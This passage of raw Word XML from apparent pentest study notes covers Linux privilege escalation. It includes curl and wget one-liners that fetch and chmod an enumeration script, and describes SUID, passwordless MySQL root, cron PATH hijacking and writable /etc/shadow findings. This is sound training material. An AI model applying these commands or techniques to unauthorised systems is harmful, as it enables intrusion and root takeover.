      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, there was a process running /opt/rpc.py which was vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It had an exploit that allowed RCE. More can be found about rpc.py in this document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId414">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50983</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015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4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h771kll5abkr" w:id="179"/>
      <w:bookmarkEnd w:id="179"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Smart Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001550">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId415">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/diego-treitos/linux-smart-enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001551">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001552">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One liners to download it and get allow it to be executed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001553">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001554">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001555">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001556">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001557">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to ignore the questions it asks you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001559">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to make it verbose level 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The levels are 0 (no flag), 1, and 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1lcycbtq8w9e" w:id="180"/>
      <w:bookmarkEnd w:id="180"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Helpful sections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000155F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All from Tib3rius Linux Priv Esc Course</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001560">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001561">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uncommon SUID bit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001562">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="122" name="image132.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image132.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41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1563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uncommon SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001564">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From SUID video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001565">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001566">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001567">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="584200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="275" name="image266.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image266.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41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568">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can connect to MySQL as root without any password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001569">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron job PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="388" name="image390.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image390.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId418"/>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156C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can write to paths in cron job PATH variable, meaning we can possibly make it run our executables instead of the original ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000156F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001570">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001571">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001572">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001573">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001574">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001575">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001576">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writeable files outside of user's home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001577">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2981325" cy="1647825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="146" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId419"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="29813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1578">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="855"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable files </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001579">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="855"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This includes /etc/passwd and /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157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57E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uhlkgurambko" w:id="181"/>
      <w:bookmarkEnd w:id="181"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000157F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001580">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A comprehensive list of Linux privilege escalation techniques can be found here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001581">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
